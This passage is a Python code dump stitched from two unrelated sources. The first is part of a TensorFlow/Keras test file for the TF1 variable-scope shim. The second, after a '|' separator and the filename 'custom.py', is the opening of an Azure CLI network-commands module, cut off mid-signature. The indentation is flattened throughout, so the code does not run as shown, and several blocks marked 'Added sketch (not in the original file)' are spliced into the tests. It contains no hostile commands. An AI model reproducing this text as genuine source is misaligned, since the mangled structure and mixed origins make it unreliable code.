_ = tf.compat.v1.get_variable(
"y", dtype=tf.int64, initializer=numpy.arange(73))
self.assertEqual(varname_type[0], ("x", tf.float32))
self.assertEqual(varname_type[1], ("y", tf.int64))
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testGetVariableWithRefDtype(self):
v = tf.compat.v1.get_variable("v", shape=[3, 4], dtype=tf.float32)
# Ensure it is possible to do get_variable with a _ref dtype passed in.
_ = tf.compat.v1.get_variable("w", shape=[5, 6], dtype=v.dtype)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testGetVariableWithInitializerWhichTakesNoArgs(self):
v = tf.compat.v1.get_variable("foo", initializer=lambda: [2])
self.assertEqual(v.name, "foo:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testGetVariableWithInitializerWhichTakesOptionalArgs(self):
v = tf.compat.v1.get_variable("foo", initializer=lambda x=True: [2])
self.assertEqual(v.name, "foo:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testTwoGraphs(self):
def f():
g1 = tf.Graph()
g2 = tf.Graph()
with g1.as_default():
with g2.as_default():
with tf.compat.v1.variable_scope("_"):
pass
self.assertRaisesRegex(ValueError,
"'_' is not a valid (?:root )?scope name", f)
class VariableScopeWithCustomGetterTest(tf.test.TestCase):
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testNonCallableGetterFails(self):
with self.assertRaisesRegex(ValueError, r"custom_getter .* not callable:"):
with tf.compat.v1.variable_scope("scope0", custom_getter=3):
tf.compat.v1.get_variable("name0")
with self.assertRaisesRegex(ValueError, r"custom_getter .* not callable:"):
tf.compat.v1.get_variable("name0", custom_getter=3)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testNoSideEffectsWithIdentityCustomGetter(self):
called = [0]
def custom_getter(getter, *args, **kwargs):
called[0] += 1
return getter(*args, **kwargs)
with tf.compat.v1.variable_scope(
"scope", custom_getter=custom_getter) as scope:
v = tf.compat.v1.get_variable("v", [1])
with tf.compat.v1.variable_scope(scope, reuse=True):
v2 = tf.compat.v1.get_variable("v", [1])
with tf.compat.v1.variable_scope("new_scope") as new_scope:
v3 = tf.compat.v1.get_variable("v3", [1])
with tf.compat.v1.variable_scope(
new_scope, reuse=True, custom_getter=custom_getter):
v4 = tf.compat.v1.get_variable("v3", [1])
self.assertIs(v, v2)
self.assertIs(v3, v4)
self.assertEqual(3, called[0]) # skipped one in the first new_scope
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testSynchronizationAndAggregationWithCustomGetter(self):
called = [0]
synchronization = tf.VariableSynchronization.AUTO
aggregation = tf.compat.v1.VariableAggregation.NONE
def custom_getter(getter, *args, **kwargs):
called[0] += 1
# Verify synchronization and aggregation kwargs are as expected.
self.assertEqual(kwargs["synchronization"], synchronization)
self.assertEqual(kwargs["aggregation"], aggregation)
return getter(*args, **kwargs)
with tf.compat.v1.variable_scope("scope", custom_getter=custom_getter):
tf.compat.v1.get_variable("v", [1])
self.assertEqual(1, called[0])
with tf.compat.v1.variable_scope("scope", custom_getter=custom_getter):
synchronization = tf.VariableSynchronization.ON_READ
aggregation = tf.compat.v1.VariableAggregation.MEAN
tf.compat.v1.get_variable(
"v1", [1], synchronization=synchronization, aggregation=aggregation)
self.assertEqual(2, called[0])
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVariableCreator(self):
variable_names = []
def creator_a(next_creator, **kwargs):
variable_names.append(kwargs.get("name", ""))
return next_creator(**kwargs)
def creator_b(next_creator, **kwargs):
kwargs["name"] = "forced_name"
return next_creator(**kwargs)
with tf.variable_creator_scope(creator_a):
with tf.variable_creator_scope(creator_b):
tf.compat.v1.Variable(1.0, name="one_name")
self.assertEqual(variable_names[0], "forced_name")
called = [False]
def creater_c(next_creator, **kwargs):
called[0] = True
self.assertEqual(kwargs["synchronization"],
tf.VariableSynchronization.ON_WRITE)
self.assertEqual(kwargs["aggregation"],
tf.compat.v1.VariableAggregation.MEAN)
return next_creator(**kwargs)
with tf.variable_creator_scope(creater_c):
tf.compat.v1.get_variable(
"v", [],
synchronization=tf.VariableSynchronization.ON_WRITE,
aggregation=tf.compat.v1.VariableAggregation.MEAN)
self.assertTrue(called[0])
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVariableCreatorNestingError(self):
def creator(next_creator, **kwargs):
return next_creator(**kwargs)
# Save the state so we can clean up at the end.
graph = tf.compat.v1.get_default_graph()
old_creator_stack = graph._variable_creator_stack
try:
scope = tf.variable_creator_scope(creator)
scope.__enter__()
with tf.variable_creator_scope(creator):
with self.assertRaises(RuntimeError):
scope.__exit__(None, None, None)
finally:
graph._variable_creator_stack = old_creator_stack
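# --- Added sketch (not in the original file) of the custom_getter protocol ---
# As the custom getter tests above show, a `custom_getter` receives the next
# `getter` plus the original arguments and should delegate to it; it may
# inspect or rewrite the kwargs first. The helper name is illustrative.
def _logging_custom_getter(getter, *args, **kwargs):
  # A real getter could adjust kwargs (e.g. dtype or initializer) here before
  # delegating to the wrapped getter.
  print("get_variable requested:", kwargs.get("name"))
  return getter(*args, **kwargs)
# Typical use:
#   with tf.compat.v1.variable_scope("scope", custom_getter=_logging_custom_getter):
#     tf.compat.v1.get_variable("v", [1])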
class VariableScopeMultithreadedTest(tf.test.TestCase):
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testReenterMainScope(self):
def thread_fn(graph, main_thread_scope):
with graph.as_default():
# Variable created with main scope will have prefix "main".
with tf.compat.v1.variable_scope(main_thread_scope):
with tf.compat.v1.variable_scope("foo"):
v = tf.compat.v1.get_variable("v", [])
self.assertEqual("main/foo/v:0", v.name)
# Variable created outside main scope will not have prefix "main".
with tf.compat.v1.variable_scope("bar"):
v = tf.compat.v1.get_variable("v", [])
self.assertEqual("bar/v:0", v.name)
graph = tf.compat.v1.get_default_graph()
with tf.compat.v1.variable_scope("main") as main_thread_scope:
thread = threading.Thread(
target=thread_fn, args=(graph, main_thread_scope))
thread.start()
thread.join()
class CompatV1TemplateScaleByY(variable_scope_shim.VariableScopeLayer):
def __init__(self, **kwargs):
super().__init__(**kwargs)
def my_op(x, scalar_name):
var1 = tf.compat.v1.get_variable(
scalar_name,
shape=[],
regularizer=regularizers.L2(),
initializer=tf.compat.v1.constant_initializer(1.5))
return x * var1
self.scale_by_y = tf.compat.v1.make_template(
"scale_by_y", my_op, scalar_name="y")
def forward_pass(self, inputs):
with tf.compat.v1.variable_scope("foo"):
return self.scale_by_y(inputs)
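# --- Added usage sketch (not part of the original test file) ---
# Mirrors the make_template tests further below: calling the shim-backed layer
# runs `forward_pass`, the template creates `y` once under `foo/scale_by_y`,
# and later calls reuse it. The helper name is illustrative and the function
# is never called automatically.
def _template_layer_usage_sketch():
  layer = CompatV1TemplateScaleByY()
  out = layer(tf.ones(shape=(2, 3)))  # equals 1.5 * ones, since y == 1.5
  weight_names = [v.name for v in layer.weights]  # ["foo/scale_by_y/y:0"]
  return out, weight_names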
class VariableScopeModule(tf.Module):
"""Module that uses the shim."""
@variable_scope_shim.track_tf1_style_variables
def __call__(self, *args, **kwargs):
with self.name_scope:
return self.forward_pass(*args, **kwargs)
def get_compat_v1_regularization_losses(self):
"""Dict w/ regularization losses from `get_variable`&`compat.v1.layers`."""
return {name: regularizer() for name, regularizer
in self._tf1_style_var_store._regularizers.items()} # pylint: disable=protected-access
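# --- Added sketch (not in the original file) of subclassing the module shim ---
# `forward_pass` holds the TF1-style `get_variable` code; `__call__` (through
# `track_tf1_style_variables` above) makes repeated calls reuse the same
# variables instead of re-creating them. The class, scope, and variable names
# below are illustrative.
class _ScaleModuleSketch(VariableScopeModule):

  def forward_pass(self, inputs):
    with tf.compat.v1.variable_scope("scale"):
      # Created on the first call, reused on every later call.
      w = tf.compat.v1.get_variable(
          "w", shape=[], initializer=tf.compat.v1.ones_initializer())
    return inputs * w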
@combinations.generate(combinations.combine(mode=["eager"]))
class TF1VariableScopeLayerTest(tf.test.TestCase, parameterized.TestCase):
def test_get_variable(self):
# Test the shim when using `get_variable` (and regularizers) directly
class WrappedDenseLayer(variable_scope_shim.VariableScopeLayer):
def __init__(self, units, *args, **kwargs):
super().__init__(*args, **kwargs)
self.units = units
def forward_pass(self, inputs, training=None):
out = inputs
with tf.compat.v1.variable_scope("dense_one"):
# The weights are created with a `regularizer`,
# so the layer should track their regularization losses
kernel = tf.compat.v1.get_variable(
shape=[out.shape[-1], self.units],
regularizer=regularizers.L2(),
initializer=tf.compat.v1.ones_initializer(),
name="kernel")
bias = tf.compat.v1.get_variable(
shape=[self.units,],
initializer=tf.compat.v1.zeros_initializer(),
name="bias")
out = tf.matmul(out, kernel)
out = tf.nn.bias_add(out, bias)
with tf.compat.v1.variable_scope("nested_scope"):
with tf.compat.v1.variable_scope("dense_two"):
kernel = tf.compat.v1.get_variable(
shape=[out.shape[-1], self.units],
regularizer=regularizers.L2(),
initializer=tf.compat.v1.ones_initializer(),
name="kernel")
bias = tf.compat.v1.get_variable(
shape=[self.units,],
initializer=tf.compat.v1.zeros_initializer(),
name="bias")
out = tf.matmul(out, kernel)
out = tf.nn.bias_add(out, bias)
return out
layer = WrappedDenseLayer(10)
out = layer(tf.ones(shape=(5, 5)))
weights = {x.name: x for x in layer.variables}
# Verify the correct output, regularization losses, + variables were made
self.assertEqual(weights.keys(), {"dense_one/bias:0",
"dense_one/kernel:0",
"nested_scope/dense_two/bias:0",
"nested_scope/dense_two/kernel:0"})
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 50)
self.assertAllEqual(tf.add_n(layer.losses), 1.5)
# Verify reuse by updating the variables then re-running
weights["dense_one/kernel:0"].assign(tf.ones(shape=(5, 10)) * 2)
weights["nested_scope/dense_two/kernel:0"].assign(
tf.ones(shape=(10, 10)) * 2)
out = layer(tf.ones(shape=(5, 5)))
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 200)
self.assertAllEqual(tf.add_n(layer.losses), 6)
def test_compat_v1_layer(self):
# Test the shim when using `compat.v1` layers
class WrappedDenseLayer(variable_scope_shim.VariableScopeLayer):
def __init__(self, units, *args, **kwargs):
super().__init__(*args, **kwargs)
self.units = units
def forward_pass(self, inputs, training=None):
out = core_layers.dense(
inputs, self.units, name="dense_one",
kernel_initializer=tf.compat.v1.ones_initializer(),
kernel_regularizer="l2")
with tf.compat.v1.variable_scope("nested_scope"):
out = core_layers.dense(
out, self.units, name="dense_two",
kernel_initializer=tf.compat.v1.ones_initializer(),
kernel_regularizer="l2")
return out
layer = WrappedDenseLayer(10)
out = layer(tf.ones(shape=(5, 5)))
weights = {x.name: x for x in layer.variables}
# Verify the correct output, losses, + variables were made
self.assertEqual(weights.keys(), {"dense_one/bias:0",
"dense_one/kernel:0",
"nested_scope/dense_two/bias:0",
"nested_scope/dense_two/kernel:0"})
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 50)
self.assertAllEqual(tf.add_n(layer.losses), 1.5)
# Verify reuse by updating the variables then re-running
weights["dense_one/kernel:0"].assign(tf.ones(shape=(5, 10)) * 2)
weights["nested_scope/dense_two/kernel:0"].assign(
tf.ones(shape=(10, 10)) * 2)
out = layer(tf.ones(shape=(5, 5)))
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 200)
self.assertAllEqual(tf.add_n(layer.losses), 6)
def test_shim_exporting(self):
class WrappedDenseLayer(variable_scope_shim.VariableScopeLayer):
def __init__(self, units, *args, **kwargs):
super().__init__(*args, **kwargs)
self.units = units
def forward_pass(self, inputs, training=None):
out = core_layers.dense(
inputs,
self.units,
name="dense_one",
kernel_initializer=tf.compat.v1.ones_initializer(),
kernel_regularizer="l2")
with tf.compat.v1.variable_scope("nested_scope"):
out = core_layers.dense(
out,
self.units,
name="dense_two",
kernel_initializer=tf.compat.v1.ones_initializer(),
kernel_regularizer="l2")
return out
layer = WrappedDenseLayer(10)
layer(tf.ones(shape=(5, 5)))
tmp_dir = self.get_temp_dir()
tf.saved_model.save(layer, tmp_dir)
def test_module_get_variable(self):
# Test the module shim when using `get_variable` (and regularizers) directly
class WrappedDenseLayer(VariableScopeModule):
def __init__(self, units, *args, **kwargs):
super().__init__(*args, **kwargs)
self.units = units
def forward_pass(self, inputs, training=None):
out = inputs
with tf.compat.v1.variable_scope("dense_one"):
# The weights are created with a `regularizer`,
# so the layer should track their regularization losses
kernel = tf.compat.v1.get_variable(
shape=[out.shape[-1], self.units],
regularizer=regularizers.L2(),
initializer=tf.compat.v1.ones_initializer(),
name="kernel")
bias = tf.compat.v1.get_variable(
shape=[self.units,],
initializer=tf.compat.v1.zeros_initializer(),
name="bias")
out = tf.matmul(out, kernel)
out = tf.nn.bias_add(out, bias)
with tf.compat.v1.variable_scope("nested_scope"):
with tf.compat.v1.variable_scope("dense_two"):
kernel = tf.compat.v1.get_variable(
shape=[out.shape[-1], self.units],
regularizer=regularizers.L2(),
initializer=tf.compat.v1.ones_initializer(),
name="kernel")
bias = tf.compat.v1.get_variable(
shape=[self.units,],
initializer=tf.compat.v1.zeros_initializer(),
name="bias")
out = tf.matmul(out, kernel)
out = tf.nn.bias_add(out, bias)
return out
layer = WrappedDenseLayer(10)
out = layer(tf.ones(shape=(5, 5)))
weights = {x.name: x for x in layer.variables}
# Verify the correct output, regularization losses, + variables were made
self.assertEqual(weights.keys(), {"dense_one/bias:0",
"dense_one/kernel:0",
"nested_scope/dense_two/bias:0",
"nested_scope/dense_two/kernel:0"})
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 50)
self.assertAllEqual(
tf.add_n(layer.get_compat_v1_regularization_losses().values()), 1.5)
# Verify reuse by updating the variables then re-running
weights["dense_one/kernel:0"].assign(tf.ones(shape=(5, 10)) * 2)
weights["nested_scope/dense_two/kernel:0"].assign(
tf.ones(shape=(10, 10)) * 2)
out = layer(tf.ones(shape=(5, 5)))
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 200)
self.assertAllEqual(
tf.add_n(layer.get_compat_v1_regularization_losses().values()), 6)
def test_module_compat_v1_layer(self):
# Test the module shim when using `compat.v1` layers
class WrappedDenseLayer(VariableScopeModule):
def __init__(self, units, *args, **kwargs):
super().__init__(*args, **kwargs)
self.units = units
def forward_pass(self, inputs, training=None):
out = core_layers.dense(
inputs, self.units, name="dense_one",
kernel_initializer=tf.compat.v1.ones_initializer(),
kernel_regularizer="l2")
with tf.compat.v1.variable_scope("nested_scope"):
out = core_layers.dense(
out, self.units, name="dense_two",
kernel_initializer=tf.compat.v1.ones_initializer(),
kernel_regularizer="l2")
return out
layer = WrappedDenseLayer(10)
out = layer(tf.ones(shape=(5, 5)))
weights = {x.name: x for x in layer.variables}
# Verify the correct output, losses, + variables were made
self.assertEqual(weights.keys(), {"dense_one/bias:0",
"dense_one/kernel:0",
"nested_scope/dense_two/bias:0",
"nested_scope/dense_two/kernel:0"})
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 50)
self.assertAllEqual(tf.add_n(
layer.get_compat_v1_regularization_losses().values()), 1.5)
# Verify reuse by updating the variables then re-running
weights["dense_one/kernel:0"].assign(tf.ones(shape=(5, 10)) * 2)
weights["nested_scope/dense_two/kernel:0"].assign(
tf.ones(shape=(10, 10)) * 2)
out = layer(tf.ones(shape=(5, 5)))
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 200)
self.assertAllEqual(tf.add_n(
layer.get_compat_v1_regularization_losses().values()), 6)
def test_shim_nesting(self):
# Test that nesting the shim in itself works
class NestedLayer(variable_scope_shim.VariableScopeLayer):
def __init__(self, units, name, *args, **kwargs):
super().__init__(*args, name=name, **kwargs)
self.units = units
def forward_pass(self, inputs):
out = inputs
with tf.compat.v1.variable_scope(self.name):
# The weights are created with a `regularizer`,
# so the layer should track their regularization losses
kernel = tf.compat.v1.get_variable(
shape=[out.shape[-1], self.units],
regularizer=regularizers.L2(1.0),
initializer=tf.compat.v1.ones_initializer(),
name="kernel")
bias = tf.compat.v1.get_variable(
shape=[self.units,],
initializer=tf.compat.v1.initializers.zeros,
name="bias")
out = tf.linalg.matmul(out, kernel)
out = tf.compat.v1.nn.bias_add(out, bias)
return out
class WrappedDenseLayer(variable_scope_shim.VariableScopeLayer):
def __init__(self, units, **kwargs):
super().__init__(**kwargs)
self.units = units
self.dense_layer_a = None
self.dense_layer_b = None
def forward_pass(self, inputs):
# Only create the nested tf.variable/module/layer/model if it has not
# already been created!
if not self.dense_layer_a:
self.dense_layer_a = NestedLayer(self.units * 2, "dense_one")
out = self.dense_layer_a(inputs)
if not self.dense_layer_b:
self.dense_layer_b = NestedLayer(self.units, "dense_two")
out = self.dense_layer_b(out)
return out
layer = WrappedDenseLayer(5)
out = layer(tf.ones(shape=(1, 3)))
weights = {x.name: x for x in layer.variables}
# Verify the correct output, losses, + variables were made
# (Specifically: no double-counting of any weights or reg. losses
# between nested components!)
self.assertEqual({var.name for var in layer.trainable_weights},
{"dense_one/bias:0",
"dense_one/kernel:0",
"dense_two/bias:0",
"dense_two/kernel:0"})
self.assertEqual({var.name for var in layer.dense_layer_a.weights},
{"dense_one/bias:0",
"dense_one/kernel:0"})
self.assertEqual({var.name for var in layer.dense_layer_b.weights},
{"dense_two/bias:0",
"dense_two/kernel:0"})
self.assertAllEqual(out, tf.ones(shape=(1, 5)) * 30)
self.assertAllEqual(tf.add_n(layer.dense_layer_a.losses), 30)
self.assertAllEqual(tf.add_n(layer.dense_layer_b.losses), 50)
self.assertAllEqual(tf.add_n(layer.losses), 80)
# Verify reuse by updating the variables then re-running
weights["dense_one/kernel:0"].assign(tf.ones(shape=(3, 10)) * 2)
weights["dense_two/kernel:0"].assign(
tf.ones(shape=(10, 5)) * 2)
out = layer(tf.ones(shape=(1, 3)))
self.assertAllEqual(out, tf.ones(shape=(1, 5)) * 120)
self.assertAllEqual(tf.add_n(layer.losses), 320)
def test_compat_v1_make_template_in_shim_eager(self):
# Test the shim when using `compat.v1.make_template`
# Verify it works correctly in eager
layer = CompatV1TemplateScaleByY()
for _ in range(3):
# Use multiple calls to verify that no new weights get created
self.assertAllEqual(layer(tf.ones(shape=(2, 3))),
tf.constant(1.5, shape=(2, 3)))
self.assertAllEqual({var.name: var.numpy() for var in layer.weights},
{"foo/scale_by_y/y:0": 1.5})
self.assertAllEqual(tf.add_n(layer.losses),
regularizers.L2()(layer.weights[0]))
def test_compat_v1_make_template_in_shim_tf_function(self):
# Test the shim when using `compat.v1.make_template`
# Verify it works correctly in a tf.function
# when made outside the function
layer = CompatV1TemplateScaleByY()
@tf.function
def foo(x):
return layer(x), tf.add_n(layer.losses)
for _ in range(3):
# Use multiple calls to verify that no new weights get created
out, loss = foo(tf.ones(shape=(2, 3)))
self.assertAllEqual(out, tf.constant(1.5, shape=(2, 3)))
self.assertAllEqual(loss, regularizers.L2()(layer.weights[0]))
self.assertAllEqual({var.name: var.numpy() for var in layer.weights},
{"foo/scale_by_y/y:0": 1.5})
def test_compat_v1_make_template_in_trace_in_shim(self):
# Test the shim when using `compat.v1.make_template`
# Verify it works correctly when the make_template/layer/shim
# is created on the first tf.function trace!
layers = {}
@tf.function
def bar(x):
if "layer" not in layers:
layers["layer"] = CompatV1TemplateScaleByY()
layer = layers["layer"]
return layer(x), tf.add_n(layer.losses)
for _ in range(3):
# Use multiple calls to verify that no new weights get created
out, loss = bar(tf.ones(shape=(2, 3)))
self.assertAllEqual(out, tf.constant(1.5, shape=(2, 3)))
self.assertAllEqual(loss, regularizers.L2()(layers["layer"].weights[0]))
self.assertAllEqual(
{var.name: var.numpy() for var in layers["layer"].weights},
{"foo/scale_by_y/y:0": 1.5})
def test_only_track_get_variable(self):
# Test the shim does not try tracking or reusing variables
# that were not created by get_variable. These variables/modules/layers
# need to be tracked separately
class WrappedDenseLayer(variable_scope_shim.VariableScopeLayer):
def __init__(self, units, **kwargs):
super().__init__(**kwargs)
self.units = units
self._dense_model = None
def forward_pass(self, inputs):
dense_layer = core.Dense(
self.units, name="dense",
kernel_initializer=tf.compat.v1.ones_initializer(),
kernel_regularizer="l2")
return dense_layer(inputs)
layer = WrappedDenseLayer(10)
out = layer(tf.ones(shape=(5, 5)))
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 5)
self.assertEmpty(layer.weights)
def test_embedded_keras_model(self):
# Test the shim when embedding a Keras model inside of it
# And assigning the model to an attribute
class WrappedDenseLayer(variable_scope_shim.VariableScopeLayer):
def __init__(self, units, **kwargs):
super().__init__(**kwargs)
self.units = units
self._dense_model = None
def forward_pass(self, inputs):
if not self._dense_model:
inp = input_layer_module.Input(shape=inputs.shape)
dense_layer = core.Dense(
self.units, name="dense",
kernel_initializer=tf.compat.v1.ones_initializer(),
kernel_regularizer="l2")
self._dense_model = training_module.Model(
inputs=inp, outputs=dense_layer(inp))
return self._dense_model(inputs)
layer = WrappedDenseLayer(10)
out = layer(tf.ones(shape=(5, 5)))
weights = {x.name: x for x in layer.variables}
# Verify the correct output, losses, + variables were made
self.assertEqual(weights.keys(), {"dense/bias:0",
"dense/kernel:0"})
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 5)
self.assertAllEqual(tf.add_n(layer.losses), 0.5)
# Verify reuse by updating the variables then re-running
weights["dense/kernel:0"].assign(
tf.ones(shape=(5, 10)) * 2)
out = layer(tf.ones(shape=(5, 5)))
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 10)
self.assertAllEqual(tf.add_n(layer.losses), 2)
def test_embedded_keras_model_in_module(self):
# Test the module shim when embedding a Keras model inside of it
# And assigning the model to an attribute
class WrappedDenseLayer(VariableScopeModule):
def __init__(self, units, **kwargs):
super().__init__(**kwargs)
self.units = units
self._dense_model = None
def forward_pass(self, inputs):
if not self._dense_model:
inp = input_layer_module.Input(shape=inputs.shape)
dense_layer = core.Dense(
self.units, name="dense",
kernel_initializer=tf.compat.v1.ones_initializer(),
kernel_regularizer="l2")
self._dense_model = training_module.Model(
inputs=inp, outputs=dense_layer(inp))
return self._dense_model(inputs)
layer = WrappedDenseLayer(10)
out = layer(tf.ones(shape=(5, 5)))
weights = {x.name: x for x in layer.variables}
# Verify the correct output, losses, + variables were made
self.assertEqual(weights.keys(), {"dense/bias:0",
"dense/kernel:0"})
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 5)
# The module shim will only track regularization losses made by
# compat.v1.layers and compat.v1.get_variable. Other regularization
# losses must be tracked by separate user-created mechanisms.
self.assertEmpty(layer.get_compat_v1_regularization_losses())
# Verify reuse by updating the variables then re-running
weights["dense/kernel:0"].assign(
tf.ones(shape=(5, 10)) * 2)
out = layer(tf.ones(shape=(5, 5)))
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 10)
# The module shim will only track regularization losses made by
# compat.v1.layers and compat.v1.get_variable. Other regularization
# losses must be tracked by separate user-created mechanisms.
self.assertEmpty(layer.get_compat_v1_regularization_losses())
def test_training_arg(self):
# Test the shim when passing in a Keras `training` arg
class TrainingCheckLayer(variable_scope_shim.VariableScopeLayer):
def __init__(self, units, *args, **kwargs):
super().__init__(*args, **kwargs)
self.units = units
def forward_pass(self, inputs, training=None):
if training:
out = core_layers.dense(inputs, self.units, name="dense_training")
else:
out = core_layers.dense(inputs, self.units, name="dense_no_training")
return out
layer = TrainingCheckLayer(10)
layer(tf.ones(shape=(5, 5)), training=True)
weights = {x.name: x for x in layer.variables}
# Verify the correct variables were made
self.assertEqual(weights.keys(),
{"dense_training/bias:0", "dense_training/kernel:0"})
layer = TrainingCheckLayer(10)
layer(tf.ones(shape=(5, 5)))
weights = {x.name: x for x in layer.variables}
# Verify the correct variables were made
self.assertEqual(weights.keys(),
{"dense_no_training/bias:0", "dense_no_training/kernel:0"})
def test_incorrect_decoration(self):
# Raise an error if you incorrectly decorate a method
# that is not a method of a Module, layer, or model:
@variable_scope_shim.track_tf1_style_variables
def foo(x):
return x * 2
with self.assertRaisesRegex(ValueError, "does not extend"):
foo(tf.ones(shape=(4, 4)))
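# Illustrative sketch (not part of the test suite above): the minimal usage pattern these
# tests exercise. The class name `ExampleGetVariableLayer` is hypothetical; the
# `VariableScopeLayer` base class, the `forward_pass` method, and
# `tf.compat.v1.get_variable` are the APIs already covered by the tests in this file.
class ExampleGetVariableLayer(variable_scope_shim.VariableScopeLayer):
  """Minimal shim layer: weights made by get_variable are captured and reused."""

  def forward_pass(self, inputs):
    # The shim tracks variables created through tf.compat.v1.get_variable, so
    # repeated calls reuse the same kernel instead of creating a new one.
    kernel = tf.compat.v1.get_variable(
        "kernel",
        shape=[inputs.shape[-1], inputs.shape[-1]],
        initializer=tf.compat.v1.ones_initializer())
    return tf.matmul(inputs, kernel)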
if __name__ == "__main__":
tf.test.main()
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from collections import Counter, OrderedDict
from msrestazure.tools import parse_resource_id, is_valid_resource_id, resource_id
from knack.log import get_logger
from azure.mgmt.trafficmanager.models import MonitorProtocol, ProfileStatus
# pylint: disable=no-self-use,no-member,too-many-lines,unused-argument
from azure.cli.core.commands import cached_get, cached_put, upsert_to_collection, get_property
from azure.cli.core.commands.client_factory import get_subscription_id, get_mgmt_service_client
from azure.cli.core.util import CLIError, sdk_no_wait, find_child_item, find_child_collection
from azure.cli.core.azclierror import InvalidArgumentValueError, RequiredArgumentMissingError, \
UnrecognizedArgumentError, ResourceNotFoundError, CLIInternalError
from azure.cli.core.profiles import ResourceType, supported_api_version
from azure.cli.command_modules.network._client_factory import network_client_factory
from azure.cli.command_modules.network.zone_file.parse_zone_file import parse_zone_file
from azure.cli.command_modules.network.zone_file.make_zone_file import make_zone_file
import threading
import time
import platform
import subprocess
logger = get_logger(__name__)
# region Utility methods
def _log_pprint_template(template):
import json
logger.info('==== BEGIN TEMPLATE ====')
logger.info(json.dumps(template, indent=2))
logger.info('==== END TEMPLATE ====')
def _get_default_name(balancer, property_name, option_name):
return _get_default_value(balancer, property_name, option_name, True)
def _get_default_id(balancer, property_name, option_name):
return _get_default_value(balancer, property_name, option_name, False)
def _get_default_value(balancer, property_name, option_name, return_name):
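    """Return the name or full resource ID of the sole item of `property_name` on `balancer`.

    Raises CLIError when there are zero or multiple candidate values.
    """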
values = [x.id for x in getattr(balancer, property_name)]
if len(values) > 1:
raise CLIError("Multiple possible values found for '{0}': {1}\nSpecify '{0}' "
"explicitly.".format(option_name, ', '.join(values)))
if not values:
raise CLIError("No existing values found for '{0}'. Create one first and try "
"again.".format(option_name))
return values[0].rsplit('/', 1)[1] if return_name else values[0]
# endregion
# region Generic list commands
def _generic_list(cli_ctx, operation_name, resource_group_name):
ncf = network_client_factory(cli_ctx)
operation_group = getattr(ncf, operation_name)
if resource_group_name:
return operation_group.list(resource_group_name)
return operation_group.list_all()
def list_vnet(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'virtual_networks', resource_group_name)
def list_express_route_circuits(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'express_route_circuits', resource_group_name)
def create_express_route_auth(cmd, resource_group_name, circuit_name, authorization_name):
ExpressRouteCircuitAuthorization = cmd.get_models('ExpressRouteCircuitAuthorization')
client = network_client_factory(cmd.cli_ctx).express_route_circuit_authorizations
return client.begin_create_or_update(resource_group_name,
circuit_name,
authorization_name,
ExpressRouteCircuitAuthorization())
def list_lbs(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'load_balancers', resource_group_name)
def list_nics(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'network_interfaces', resource_group_name)
def list_nsgs(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'network_security_groups', resource_group_name)
def list_nsg_rules(cmd, resource_group_name, network_security_group_name, include_default=False):
client = network_client_factory(cmd.cli_ctx).network_security_groups
nsg = client.get(resource_group_name, network_security_group_name)
rules = nsg.security_rules
if include_default:
rules = rules + nsg.default_security_rules
return rules
def list_custom_ip_prefixes(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'custom_ip_prefixes', resource_group_name)
def list_public_ips(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'public_ip_addresses', resource_group_name)
def list_public_ip_prefixes(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'public_ip_prefixes', resource_group_name)
def list_route_tables(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'route_tables', resource_group_name)
def list_application_gateways(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'application_gateways', resource_group_name)
def list_network_watchers(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'network_watchers', resource_group_name)
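# Illustrative sketch (hypothetical helper, not wired up in commands.py): any further
# "list" command follows the same _generic_list pattern; 'nat_gateways' is assumed here to
# be an operation group on the network management client.
def list_nat_gateways_example(cmd, resource_group_name=None):
    return _generic_list(cmd.cli_ctx, 'nat_gateways', resource_group_name)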
# endregion
# region ApplicationGateways
# pylint: disable=too-many-locals
def _is_v2_sku(sku):
return 'v2' in sku
# pylint: disable=too-many-statements
def create_application_gateway(cmd, application_gateway_name, resource_group_name, location=None,
tags=None, no_wait=False, capacity=2,
cert_data=None, cert_password=None, key_vault_secret_id=None,
frontend_port=None, http_settings_cookie_based_affinity='disabled',
http_settings_port=80, http_settings_protocol='Http',
routing_rule_type='Basic', servers=None,
sku=None,
private_ip_address=None, public_ip_address=None,
public_ip_address_allocation=None,
subnet='default', subnet_address_prefix='10.0.0.0/24',
virtual_network_name=None, vnet_address_prefix='10.0.0.0/16',
public_ip_address_type=None, subnet_type=None, validate=False,
